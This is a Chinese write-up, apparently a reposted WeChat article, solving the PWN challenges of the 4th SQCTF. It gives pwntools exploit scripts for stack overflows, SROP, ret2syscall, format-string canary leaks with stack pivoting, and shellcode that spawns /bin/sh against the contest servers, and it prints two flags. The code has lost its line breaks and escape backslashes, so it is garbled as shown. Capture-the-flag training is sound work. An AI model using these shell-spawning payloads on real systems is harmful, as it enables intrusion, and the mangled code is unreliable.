浅红欺醉粉,肯信有江梅
直接nc就行了
领取你的小猫娘
存在栈溢出且给了后门函数,直接覆盖返回地址即可
from pwn import *from LibcSearcher import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 31125)#p=process('./cat')backdoor = 0x40121Bpayload = b'a'*(0x50+0x8)+p64(backdoor)p.sendlineafter(b'charactersn',payload)p.interactive()
我觉君非池中物,咫尺蛟龙云雨
读入0x20字节的shellcode并执行
X64构造如下寄存器状态
rax = 0x3brdi = "/bin//sh"指针rsi = 0rdx = 0syscall
代码:
from pwn import *from LibcSearcher import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 30871)#p=process('./pwn')#p=gdb.debug('./pwn','b main')shellcode = '''xor rsi,rsipush rsimov rdi,0x68732f2f6e69622fpush rdipush rsppop rdimov rax,0x3bcdqsyscall'''payload=asm(shellcode)p.sendafter(b'window.n',payload)p.interactive()
当时只道是寻常
题目给了控制rsi和rax的gadget
但是想要执行syscall需要
rax = 0x3brdi = "/bin/sh"rsi = 0rdx = 0syscall
ROPgadget看一下没有控制rdi的gadget
那么只能用到SROP了
在syscall后面紧跟SigreturnFrame,执行syscall时候会自动调用栈上下一个参数,然后根据SigreturnFrame的布局恢复出寄存器状态,然后SigreturnFrame的rip直接执行syscall就行了
from pwn import *from LibcSearcher import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 32328)#p=process('./pwn01')#p=gdb.debug('./pwn01','b _start')frame = SigreturnFrame()frame.rdi = 0x40203a # "/bin/sh"frame.rsi = 0 # argv = NULLframe.rdx = 0 # envp = NULLframe.rax = 59 # execveframe.rip = 0x40101d # syscall instructionrop = b'a'*0x8rop += p64(0x401049) #pop rsi; pop rax; retnrop += p64(0)rop += p64(15)rop += p64(0x40101d) #syscallrop += bytes(frame)p.send(rop)p.interactive()
江南无所有,聊赠一枝春
很明显的栈溢出还给了后门函数
from pwn import *from LibcSearcher import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 32420)#p=process('./gift')backdoor = 0x4011DCpayload = b'a'*(0x40+0x8)+p64(backdoor)p.sendlineafter(b'gift?n',payload)p.interactive()
赌书消得泼茶香
IDA打开识别到base64
输入一些a发现填充变成了69 a6 9a,证明先base64解了一下我们的payload再copy栈溢出
注意需要加加一些0抹掉栈上的历史数据
from pwn import *from LibcSearcher import *import base64context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 31613)#p=process('./pwn02')backdoor = 0x401422payload = b'a'*(0x60+0x8)+p64(backdoor)+p64(0)payload = base64.b64encode(payload)p.sendlineafter(b'now?n',payload)p.interactive()
被酒莫惊春睡重
运行观察一下发现给了/bin/sh的地址,并且存在栈溢出
gadget和syscall也给了,那么直接ret2syscall就行了
注意第二次输入的时候a别把第一次的/bin/sh覆盖过去
from pwn import *from LibcSearcher import *import base64context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 32436)#p=process('./pwn')pop_rdx_rsi_rdi_rax_ret = 0x4011E0syscall_addr = 0x4011ECp.sendline(b'/bin/shx00')p.recvuntil(b'0x')binsh_addr = int(p.recv(12),16)p.recv()p.sendline(b'1')payload = b'/bin/shx00'+b'a'*0x20+p64(pop_rdx_rsi_rdi_rax_ret)+p64(0)+p64(0)+p64(binsh_addr)+p64(0x3b)+p64(syscall_addr)p.sendline(payload)p.interactive()
铜雀春深锁二乔
格式化字符串泄露canary,栈溢出至后门函数即可
由于开启了pie后三位固定,需要栈溢出碰一下返回地址倒数第四位
执行后门发现不是binsh,只是打印了flag字符串
换思路,第一次泄露canary内容、栈上地址和程序地址,然后计算rbp地址和程序基址,栈溢出就可以返回main重新执行,第二次先布局rop链,然后栈溢出处直接栈迁移打rop链
注意栈对齐!
from pwn import *from LibcSearcher import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 31171)#p=process('./pwn03')elf = ELF('./pwn03')p.sendlineafter(b'sun.n',b'%11$p-%15$p-%17$p')p.recvuntil(b'0x')canary = int(p.recv(16),16)p.recvuntil(b'0x')proc = int(p.recv(12),16)proc_base = proc-0x125bp.recvuntil(b'0x')stack = int(p.recv(12),16)stack_input = stack-0x148main_addr = 0x1260pop_rdi_ret = 0x1245pop_rbp_ret = 0x11d3call_system = 0x1253leave_ret = 0x1234system_plt = elf.plt['system']ret_addr = 0x125Apayload = b'a'*0x8+p64(canary)+p64(0xdeadbeef)+p64(proc_base+main_addr)p.send(payload)payload = p64(proc_base+ret_addr)+p64(proc_base+pop_rdi_ret)+p64(stack_input-0x10)+p64(proc_base+call_system)+b'/bin/sh'p.sendafter(b'sun.n',payload)payload = b'a'*0x8+p64(canary)+p64(stack_input-0x30-0x8)+p64(proc_base+leave_ret)p.send(payload)p.interactive()
借的东风破金锁
输对auth_code后即可进入后门
from pwn import *from LibcSearcher import *from struct import packfrom ctypes import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 30422)#p=process('./key')elf = ELF('./key')payload = b'x46x54x43x55x4ex51x53x00'p.sendafter(b'key: ',payload)p.interactive()
得到sqctf{26e905145dfe4bc885342b199053de14}
萧萧黄叶闭疏窗
存在RWX字段,直接栈溢出到shellcode上即可
from pwn import *from LibcSearcher import *from struct import packfrom ctypes import *context(log_level = 'debug', arch = 'amd64', os = 'linux')p = remote('challenge.qsnctf.com', 30632)#p=process('./bad')elf = ELF('./bad')shellcode=asm(shellcraft.sh())payload = shellcode.ljust(0x48,b'x00')+p64(0x4040A0)p.sendlineafter(b'do ?n',payload)p.interactive()
得到sqctf{659b22040ff646b28538b510ad6fb4ed}
原文始发于微信公众号(智佳网络安全):【WP】第四届SQCTF网络安全及信息对抗大赛PWN方向题目
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论